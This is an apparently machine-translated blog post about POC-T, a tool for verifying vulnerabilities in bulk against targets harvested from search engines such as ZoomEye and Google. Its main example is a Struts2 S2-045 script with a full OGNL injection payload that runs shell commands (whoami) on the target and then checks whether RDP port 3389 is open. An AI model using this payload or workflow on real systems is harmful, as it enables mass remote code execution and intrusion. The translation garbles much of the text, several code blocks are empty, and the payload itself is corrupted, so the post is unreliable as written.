batch poc verification of emergency response to loopholes

Posted by tzul at 2020-02-29

0x01 Preface

When a high-risk vulnerability is found on the Internet, or the team finds 0 day, both Party A and Party B need to understand the impact of the vulnerability. At this time, POC batch verification is required, including the word "batch" for network security enthusiasts. We will talk about "batch" today. At present, there are many excellent POC batch validation tools. For example, my previous post ( HTML) sent pentestdb also integrated this function. The more classic one-stop services of pocsuite (, pocsuite, zoomeye and seebug can be said to be the conscience of the industry. Pocsuite needs to use pocsuite according to the template requirements The fixed function has the advantage that it can be directly controlled at the HTTP request level, thus supporting functions such as "global proxy", "global random UA", etc., while ensuring the stability and standardization of the script. For customers or operation and maintenance personnel who do not understand the verification logic, they can directly run the script. But I always feel that it is too heavy and not free enough, such as the output content and so on. I can't set it freely. Then is there a third-party library that can be introduced without any template or inheritance. In this way, it can not only expand its functions, but also ensure the maximum efficiency. What about a PoC verification framework that does not need to check the document format every time you write a script, one line of command, and can complete the task in three or five minutes? This is the poc-t recommended for you today.

0x02 introduction and installation

Three key points to be solved in batch verification:

POC-T is designed in this way

The installation is also very simple. It doesn't take up space here

[Applescript] plain text view copy code git clone [url] [/ url] PIP install - R requirement.txtpython

[Applescript] plain text view copy code

0x021 how to get data

Data sources are rich and intimate. Including single target (- is), file import (- if), search engine interface, including Google (- Ag), zoomeye (- AZ), Satan (- as). The key settings of these interfaces support manual input at runtime, and also support preset settings. In toolkit.conf under the root directory, Google also supports agents to support the wall. Is it close? Parameter - limit to limit the number of searches Eye. Other sources refer to help.

0x022 what is the processing logic

Logic verification is also known as POC. There are many POC scripts maintained by authors in script. You can use the parameter - show to list the POC script names

Parameter for loading – s POC name

0x023 how to implement concurrency

As a user, we don't have to worry about the principle of concurrency, as long as we know that we can support two concurrency modes of multithreading (- ET) gevent (- eg). Poc-t is very efficient. According to the author's test, set the thread to 30 (default 10), and test 2000 + goals in less than 3 minutes.

This is the final command format

[Applescript] plain text view the copied code Python – s POC – AZ "port: 22" – limit 100python – s POC – Ag "URL: index. PHP" – limit 100 – gproxy "socket5 1080" Python – s POC – is http: / / host / / login. PHP? Id = 1python – s POC – if / root / pentest / vul.txt

[Applescript] plain text view copy code

0x03 POC script writing is also the focus of this paper. Why is poc-t very portable? I think it is reflected in POC script writing. All validation only needs one poc() function, and the success returns true or custom information, and the failure returns false. Besides, there is no limit. There is no instance. All articles are paper tigers. Now let's take the struts 2-s045 vulnerability, which has been popular for a long time, as an example. Let's talk about how to write POC in detail. In the script directory, is a demo of POC script. On this basis, write our POC. The verification code on the Internet is

The verification code on the Internet is

[Python] plain text view copy code

[Python] plain text view copy code

[Python] plain text view copy code

That's it. Every thread of the runtime framework calls the POC () function and copies the target URL to the POC () function. Then let's take a look at the effect. I import a target text (one URL per line).

Poc-t also provides a general script extension tool. It is used to simplify the code, improve the accuracy of POC, and give more functions to scripts. These tools are located in the plugin directory. When writing scripts, you can use from import XXX to call directly. For specific functions, please refer to the original notes

Continue to take POC as an example. Now we want to know not only whether a URL has s2-045 vulnerability, but also whether a specific port is open, such as port 3389 and port 22, which can facilitate our next test. Let's see if the extension tool has the function we want.

In, there is such a function as checkporttcp() to check whether the corresponding port is open as long as there is an IP address

The parameter that can be passed in is the URL, not the IP address. The answer is still in There is such a function host2ip() that can convert the URL to the IP address. What is it really.

Our code can be written like this

[Python] plain text view the copy code import urllib2from post.encode import multipart [encode from post. Streaming HTTP import register [openersfrom plugin. Util import host2ipfrom plugin. Util import checkporttcpdef POC (URL): register [openers() datagen, header = multipart [encode ({"image1": open ("TMP. TXT"), "rb")}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUti l.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask || whoami').(#iswin=(@[email protected]('').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c', #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}" try: request = urllib2.Request(url,datagen, Headers = header) response = urllib2. Urlopen (request, timeout = 5) body = response. Read() exception: body = "" IP = host2ip (URL) ා convert URL to IP port = checkporttcp (IP, 3389) ා check whether 3389 is open if "nmask" in body: assert isinstance (port, object) return url + "---" + "3389:" + str(port) else: return False

[Python] plain text view copy code

0x04 other functions. If we understand the three key problems that need to be solved in batch, we will find that this framework can be used not only for POC batch verification, but also for other ways, as long as the principle is the same. Such as blasting, reptile, collection, etc. The author also gives some examples

0x05 conclusion: after reading this article, when there are loopholes in the future, I still use everywhere to ask "where is the batch tool?" , do it yourself, get plenty of food and clothing. But just because poc-t is light and flexible, we need our coding ability, because all logic verification and output need to be realized by our own coding without any ready-made format specification. Other excellent POC batch validation tools:

OK, that's it. Thank you for watching. We'll see you in the next issue.